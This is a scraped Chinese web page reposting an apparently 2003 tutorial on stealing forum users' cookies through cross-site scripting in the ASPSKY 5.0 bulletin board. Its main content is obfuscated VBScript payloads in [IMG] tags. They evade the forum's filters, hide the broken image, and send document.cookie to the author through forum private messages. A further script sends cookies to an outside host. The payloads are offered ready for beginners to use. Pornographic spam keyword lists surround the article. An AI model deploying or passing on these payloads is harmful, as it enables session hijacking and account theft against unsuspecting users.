婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁(yè) > 知識(shí)庫(kù) > 利用Microsoft.XMLHTTP控件發(fā)送COOKIE

利用Microsoft.XMLHTTP控件發(fā)送COOKIE

熱門標(biāo)簽:鳳臺(tái)百度地圖標(biāo)注店 外呼系統(tǒng)API接口 修改地圖標(biāo)注 武夷山旅游地圖標(biāo)注 怎么在地圖標(biāo)注自己 金昌電話機(jī)器人價(jià)格 個(gè)人可以辦理400電話么 萊西電子地圖標(biāo)注 縣域地圖標(biāo)注打印店
作者:czy czy82@elong.com>
出處:http://www.nsfocus.net
日期:2003-09-03

(注意由于論壇會(huì)對(duì)文章中的一些字符作處理,所以最好到
http://www.chinansl.com/czy/xmlhttp.txt看文章
http://www.chinansl.com/czy/aspsky5.htm測(cè)試代碼)

    跨站腳本攻擊想必各位都已經(jīng)是很熟悉了,但是得到COOKIE的時(shí)候一直有一個(gè)
問(wèn)題:總是要用WINDOW.OPEN彈一個(gè)窗體出來(lái)然后發(fā)送COOKIE,這樣隱秘性
就大打折扣了。以前我想了一個(gè)在網(wǎng)頁(yè)中用insertAdjacentHTML方法來(lái)注入HTML語(yǔ)句
的辦法勉強(qiáng)可以作到發(fā)送COOKIE不出現(xiàn)IE窗口,但是在實(shí)際使用中有時(shí)會(huì)遇到IE出錯(cuò)。

    沒(méi)有更好的辦法了嗎?以前在研究VBS病毒自動(dòng)升級(jí)的時(shí)候用到一個(gè)Microsoft.XMLHTTP
控件(該控件是WIN98/2K上都默認(rèn)自帶的東東,并且它是IE認(rèn)為safe的控件!),通過(guò)它我們
可以在網(wǎng)頁(yè)中給網(wǎng)站發(fā)送http請(qǐng)求,可以是POST也可以是GET.

    好了思路已經(jīng)到這兒來(lái),下面我們可以實(shí)戰(zhàn)一下,我以ASPSKY 5.0 0320為例子。
我們知道IMG SRC="XXXXXXX">在SRC中可以寫入vbscript:這樣的語(yǔ)句。。比如
img src="vbscript:a=(msgbox(now))">,但是我們只能執(zhí)行一個(gè)語(yǔ)句,比如
img src="vbscript:a=(msgbox(now)):b=(msgbox(now))">這樣都將是錯(cuò)誤的!
怎么辦法呢?在VBS中我們可以用EXECUTE語(yǔ)句,在JS中我們可以使用EVAL語(yǔ)!
比如:img src="vbscript:execute(#34a=(msgbox(now)):b=(msgbox(#34czy#34#34))#34)">
或是img src="javascript:eval('alert(\'nsfocus');alert(\'czy')')">

   還沒(méi)有暈吧?上面你可能會(huì)注意到用VBS的execute語(yǔ)句時(shí)雙引號(hào)要換為"這是因?yàn)椋?
在VBS中單引號(hào)要括起字符串,必須是兩個(gè)單引號(hào)代表一個(gè)又引號(hào),并且在雙引號(hào)內(nèi)!
所以在execute語(yǔ)句中我們不能用單引號(hào),而直接用"呢,在HTML進(jìn)行引號(hào)匹配的時(shí)候
會(huì)和src="后的引號(hào)匹配,所以我們只能用"代替了。

   引號(hào)的問(wèn)題解決了,在實(shí)際應(yīng)用中ASPSKY還會(huì)對(duì)我們的代碼進(jìn)行處理:
1:如果發(fā)現(xiàn)script字串,會(huì)在前面加上一個(gè)空格
2:如果發(fā)現(xiàn)http字串會(huì)認(rèn)為是一個(gè)URL,并在兩邊加上A>元素
3:如果發(fā)現(xiàn)空格會(huì)用nbsp;代替

  解決問(wèn)題:
1:vbscript用vbsCript代替
2:http用,#34#34ht#34#34+#34#34tp...代替(vbs中引號(hào)括引號(hào)里面的應(yīng)用多一對(duì),+代表連接符)
3:空格用#32代替(注不是#20)

   在最后就是發(fā)送COOKIE的問(wèn)題:
1:控件在本地可以GET,POST任意的網(wǎng)站,但是在網(wǎng)頁(yè)中竟然只能
GET,POST當(dāng)前服務(wù)器。。。。要不然IE就會(huì)說(shuō)拒絕仿問(wèn)!
2:cookie中不能有等在URL中有特殊交意的字符

  解決問(wèn)題:

1:只能發(fā)給當(dāng)前服務(wù)器,那么可以把COOKIE發(fā)到你在論壇上的注冊(cè)的用戶的郵箱嘛:)
2:replace(document.cookie,#34#34#34#34,#34#34-#34#34),在vbs中用
replace替換函用,在例子中我把""換成了"-"

問(wèn)題都解決了下面是實(shí)際的例子:
動(dòng)網(wǎng)aspsky 5.0 0320測(cè)試成功

//----------------------

[IMG]vbs#67ript:execute(#34dat=replace(document.cookie,#34#34#34#34,#34#34-#34#34):set#32http=createobject(#34#34Microsoft.XMLHTTP#34#34):http.open#32#34#34GET#34#34,#34#34ht#34#34+#34#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=sendtouser=czytitle=newssubmit=發(fā)送message=#34#34dat,false:http.send#34)[/IMG]

說(shuō)明:把COOKIE發(fā)給CZY用戶,郵件標(biāo)題叫news
//----------------------


另控件的正常用法:
script language=vbs>
dat=document.cookie
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.chinansl.com/czy/get.asp?cook="dat,false
http.send
tt=http.responsetext
msgbox tt
/script>




  讓代碼更完美,現(xiàn)在COOKIE已經(jīng)乖乖的在我們的郵箱里了,但是有一個(gè)小問(wèn)題由于圖片不
能正常的顯示會(huì)是一個(gè)小叉,旁邊還有按此在新窗口瀏覽圖片的提示。。。這又難免會(huì)讓人
生疑。

解決思路:
一個(gè)網(wǎng)頁(yè)中的所有IMG元素通過(guò)document.imanges都能例舉到,并且可以設(shè)置它們的大小,當(dāng)width=0時(shí)就
相當(dāng)于HIDDEN了.通過(guò)比較元素的src屬性的值是否含有"ript"就可以判斷是不是我們的圖片.另外比較時(shí)
大于符用#62代替,0用#48代替!

代碼:
[IMG]vbs#67ript:execute(#34for#32each#32aa#32in#32document.images:if#32instr(aa.src,#34#34ript#34#34)#62#48#32then:aa.width=0:end#32if:next#34)[/IMG]


實(shí)際應(yīng)用的代碼:
[IMG]vbs#67ript:execute(#34for#32each#32aa#32in#32document.images:if#32instr(aa.src,#34#34ript#34#34)#62#48#32then:aa.width=0:end#32if:next:dat=replace(document.cookie,#34#34#34#34,#34#34-#34#34):set#32http=createobject(#34#34Microsoft.XMLHTTP#34#34):http.open#32#34#34GET#34#34,#34#34ht#34#34+#34#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=sendtouser=czytitle=alllsubmit=發(fā)送message=#34#34dat,false:http.send#34)[/IMG]


//-------------------方便菜鳥使用:)

[Ctrl+A 全選 注:引入外部Js需再刷新一下頁(yè)面才能執(zhí)行]
您可能感興趣的文章:
  • ASP利用XMLHTTP實(shí)現(xiàn)表單提交以及cookies的發(fā)送的代碼
  • AndroidHttpClient使用Cookie應(yīng)用分析
  • C# HttpClient Cookie驗(yàn)證解決方法
  • 用VBS實(shí)現(xiàn)的發(fā)送帶Cookie的HTTP請(qǐng)求的代碼
  • .net 獲取瀏覽器Cookie(包括HttpOnly)實(shí)例分享
  • httpclient模擬登陸具體實(shí)現(xiàn)(使用js設(shè)置cookie)
  • Python模仿POST提交HTTP數(shù)據(jù)及使用Cookie值的方法
  • 詳解HTTP Cookie狀態(tài)管理機(jī)制

標(biāo)簽:楚雄 南京 通遼 邢臺(tái) 涼山 上海 清遠(yuǎn) 赤峰

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《利用Microsoft.XMLHTTP控件發(fā)送COOKIE》,本文關(guān)鍵詞  利用,Microsoft.XMLHTTP,控件,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《利用Microsoft.XMLHTTP控件發(fā)送COOKIE》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于利用Microsoft.XMLHTTP控件發(fā)送COOKIE的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    91久久香蕉国产日韩欧美9色| 麻豆久久久久久| 亚洲五月六月丁香激情| 国内精品视频一区二区三区八戒 | 中文字幕一区二区三区不卡| 亚洲一级片在线观看| 国产成人在线影院| 欧美一区午夜视频在线观看 | 视频在线观看一区二区三区| 大桥未久av一区二区三区中文| 3d动漫精品啪啪1区2区免费| 最新中文字幕一区二区三区| 豆国产96在线|亚洲| 精品国产一区二区亚洲人成毛片| 亚洲线精品一区二区三区| 成人av在线一区二区三区| 欧美精品一区二区在线播放| 日本美女视频一区二区| 欧美日韩在线三区| 一区二区理论电影在线观看| 99精品欧美一区二区三区综合在线| 欧美精品一区二区三区蜜臀| 久久99精品久久久久| 日韩美女一区二区三区| 蜜桃久久av一区| 日韩精品自拍偷拍| 久久精品国产77777蜜臀| 日韩一区二区电影网| 麻豆一区二区三| 欧美精品一区二区三区视频 | 欧美国产亚洲另类动漫| 国产精品资源网| 中文在线一区二区| 波多野结衣的一区二区三区| 亚洲欧洲99久久| 色婷婷激情综合| 一区二区三区在线观看动漫| 91福利在线看| 天涯成人国产亚洲精品一区av| 欧美日韩黄视频| 日韩电影在线一区| 2024国产精品| www.亚洲免费av| 夜夜嗨av一区二区三区| 91精品婷婷国产综合久久性色 | 国产成人在线免费| 国产精品美女久久久久久久久 | 成人爱爱电影网址| 亚洲免费观看高清在线观看| 欧美日韩视频在线观看一区二区三区| 日韩中文字幕av电影| 欧美va日韩va| ww亚洲ww在线观看国产| 成人综合婷婷国产精品久久蜜臀| 亚洲女性喷水在线观看一区| 7777精品伊人久久久大香线蕉经典版下载 | 丁香激情综合国产| 亚洲精品免费在线观看| 欧美一区二区在线观看| 成人黄色国产精品网站大全在线免费观看| 亚洲视频免费观看| 日韩一区二区电影网| 9i在线看片成人免费| 婷婷激情综合网| 日本一区二区成人| 欧美日韩视频第一区| 国产91丝袜在线播放0| 五月婷婷综合在线| 久久精品一区二区三区av | 成人午夜大片免费观看| 亚洲午夜激情网站| 国产欧美日韩综合| 91精品国产综合久久精品app| 国产成人av电影免费在线观看| 亚洲一卡二卡三卡四卡| 国产精品五月天| 欧美一区二区国产| 日本二三区不卡| 盗摄精品av一区二区三区| 美女视频黄 久久| 亚洲激情六月丁香| 日本一区二区综合亚洲| 欧美一区二区精美| 欧美伊人久久久久久久久影院| 高清成人免费视频| 久久机这里只有精品| 午夜亚洲福利老司机| 一区二区三区四区在线免费观看| 国产日产亚洲精品系列| 精品伦理精品一区| 欧美理论在线播放| 欧美日韩一区久久| 在线日韩国产精品| 色94色欧美sute亚洲线路一久| 国产成人免费在线| 国内成人精品2018免费看| 蜜臀a∨国产成人精品| 三级不卡在线观看| 亚洲综合男人的天堂| 亚洲乱码国产乱码精品精可以看| 国产人成亚洲第一网站在线播放| 337p日本欧洲亚洲大胆精品| 日韩欧美国产午夜精品| 欧美一区二区在线免费观看| 337p亚洲精品色噜噜狠狠| 欧美日韩一级二级三级| 欧美三级资源在线| 欧美日韩免费一区二区三区视频| 在线视频国内一区二区| 在线观看网站黄不卡| 91免费观看国产| 日本福利一区二区| 欧美三级资源在线| 欧美日韩高清一区二区不卡| 欧美日韩的一区二区| 欧美精品xxxxbbbb| 欧美va亚洲va国产综合| 看电影不卡的网站| 国产九色sp调教91| 成人av电影免费观看| 色拍拍在线精品视频8848| 精品视频一区二区不卡| 91精品国产丝袜白色高跟鞋| 欧美成人r级一区二区三区| 精品国内片67194| 国产精品久久久久永久免费观看| 国产精品久久二区二区| 一级做a爱片久久| 欧美a级理论片| 国产99一区视频免费| 97se狠狠狠综合亚洲狠狠| 日本精品一区二区三区高清 | 狠狠狠色丁香婷婷综合激情| 国产成人在线免费| 99re免费视频精品全部| 91精品欧美一区二区三区综合在 | 91首页免费视频| 在线亚洲一区二区| 日韩欧美国产一区在线观看| 久久九九99视频| 夜夜精品视频一区二区| 久久精品国产一区二区三区免费看| 国产成人亚洲综合a∨婷婷图片 | 国产精品免费丝袜| 午夜精品在线看| 国产成人av电影在线播放| 欧美日韩大陆一区二区| 欧美国产欧美综合| 日韩综合在线视频| 99久久99久久综合| 日韩亚洲欧美中文三级| 中文字幕一区二| 激情综合色综合久久综合| 91在线视频在线| 精品美女在线观看| 亚洲观看高清完整版在线观看| 国产精品一线二线三线| 欧美人妇做爰xxxⅹ性高电影| 日本一区二区三区四区| 日本大胆欧美人术艺术动态| 93久久精品日日躁夜夜躁欧美| 日韩一区二区电影在线| 亚洲在线视频免费观看| 成人av免费在线| 精品国产乱码久久久久久蜜臀 | 91麻豆精品91久久久久同性| 国产精品国产三级国产有无不卡| 激情综合色播五月| 欧美丰满一区二区免费视频| 亚洲色图一区二区| 国产成人av资源| 久久综合九色综合97婷婷女人| 亚洲18女电影在线观看| 色婷婷久久久久swag精品| 中文字幕中文字幕在线一区| 国产一区二区三区四| 欧美videofree性高清杂交| 天天影视涩香欲综合网| 欧美亚洲免费在线一区| 亚洲人成影院在线观看| 99国产精品久久久久久久久久 | 成人一二三区视频| 2欧美一区二区三区在线观看视频| 日韩精品91亚洲二区在线观看| 亚洲美女偷拍久久| 91丨九色porny丨蝌蚪| 中文字幕不卡的av| 不卡一二三区首页| 日韩毛片视频在线看| 91色乱码一区二区三区| 国产精品女主播在线观看| 成人黄色av电影| 国产精品短视频| 99久久精品国产毛片| 亚洲精品免费看| 欧美日韩在线播| 日本中文在线一区| 2023国产精品自拍| 成人黄色软件下载| 亚洲影视资源网|